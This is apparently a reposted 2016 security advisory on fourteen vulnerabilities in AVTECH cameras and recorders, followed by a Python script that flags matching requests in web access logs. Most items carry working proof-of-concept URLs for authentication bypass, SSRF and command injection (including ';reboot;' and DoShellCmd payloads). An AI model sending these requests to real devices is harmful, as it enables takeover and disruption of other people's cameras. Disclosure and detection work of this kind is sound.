Tuesday, 11 October 2016

Multiple vulnerabilities in AVTECH IP cameras, NVRs and DVRs

Affected product:

Platform and firmware on any AVTECH IP camera, NVR or DVR device

Avtech is the second most popular search term on Shodan. According to Shodan, more than 130,000 AVTECH devices are exposed to the internet.

List of vulnerabilities

1) Plaintext storage of administrative password

2) Missing CSRF protection

3) Unauthenticated information disclosure
POC:
GET /cgi-bin/nobody/Machine.cgi?action=get_capability

4) Unauthenticated SSRF in DVR devices
POC: http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==

5) Unauthenticated command injection in DVR devices
POC: http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(ps|grep%20Search.cgi|grep%20-v%20grep|head%20-n%201|awk%20'{print%20"/tmp/"$1".log"}');&password=admin

6) Authentication bypass #1
POC: http://<device_ip>/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*

7) Authentication bypass #2
POC: http://<device_ip>/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*

8) Unauthenticated file download from web root
POC: http://<device_ip>/cgi-bin/cgibox?.cab

9) Login captcha bypass #1
POC: http://<device_ip>/cgi-bin/nobody/VerifyCode.cgi?account=<b64(username:password)>&login=quick

10) Login captcha bypass #2

11) Authenticated command injection in CloudSetup.cgi
POC: http://<device_ip>/cgi-bin/supervisor/CloudSetup.cgi?exefile=ps

12) Authenticated command injection in adcommand.cgi
POC:
POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1
Host: <device_ip>
Content-Length: 23
Cookie: SSID=YWRtaW46YWRtaW4=

DoShellCmd "strCmd=ps&"

13) Authenticated command injection in PwdGrp.cgi
POC: http://<device_ip>/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN

14) HTTPS used without certificate verification
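For defenders who want to know whether a device behind a reverse proxy has already been probed, the following added example (written for this post, not part of the Search-Lab advisory) classifies access-log requests by the request shapes listed above. It assumes Apache combined-log-format lines, which the device itself may not produce; the sample lines are constructed, and the POST body of item 12 is never visible in an access log, so that item is flagged on method and path alone.

```python
import re
from urllib.parse import urlsplit, unquote

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')  # ip, method, target, status
SHELL_META = re.compile(r'[;|$`]')      # characters used to chain shell commands

def parse_query(raw):
    # Split on '&' only: a ';' inside a value is the injected payload, not a separator.
    q = {}
    for part in raw.split('&'):
        k, _, v = part.partition('=')
        q[unquote(k)] = unquote(v)
    return q

def classify_request(method, target):
    _, _, path, raw_q, _ = urlsplit(target)
    q = parse_query(raw_q)
    first = raw_q.split('&', 1)[0]      # the auth-bypass items put a bare token first
    hits = []
    if path == '/cgi-bin/nobody/Search.cgi' and q.get('action') == 'cgi_query':
        hits.append(4)                  # item 4: cgi_query proxies to an arbitrary host
        if SHELL_META.search(q.get('username', '') + q.get('password', '')):
            hits.append(5)              # item 5: shell metacharacters in credentials
    if path == '/cgi-bin/user/Config.cgi' and first in ('.cab', '/nobody'):
        hits.append(6 if first == '.cab' else 7)
    if path == '/cgi-bin/nobody/VerifyCode.cgi' and q.get('login') == 'quick':
        hits.append(9)
    if path == '/cgi-bin/supervisor/adcommand.cgi' and method == 'POST':
        hits.append(12)                 # body (DoShellCmd) is not in the access log
    if path == '/cgi-bin/supervisor/PwdGrp.cgi' and q.get('action') == 'add' \
            and SHELL_META.search(q.get('pwd', '')):
        hits.append(13)
    return hits

def scan_access_log(lines):
    """Return (client_ip, status, items) for every line matching an advisory item."""
    findings = []
    for m in filter(None, map(LOG_RE.match, lines)):
        ip, method, target, status = m.groups()
        items = classify_request(method, target)
        if items:                       # a 200 on items 6, 7 or 9 means the bypass worked
            findings.append((ip, int(status), items))
    return findings

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.7 - - [11/Oct/2016:09:12:05 +0000] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1" 200 340',
    '203.0.113.7 - - [11/Oct/2016:09:12:09 +0000] "GET /cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR HTTP/1.1" 401 0',
    '198.51.100.4 - - [11/Oct/2016:09:13:00 +0000] "GET /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&login=quick HTTP/1.1" 200 12',
]
```

Matches on items 6, 7 and 9 with a 200 status are the ones to escalate first, since they indicate the unauthenticated request was answered rather than rejected.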
Source: http://www.search-lab.hu/
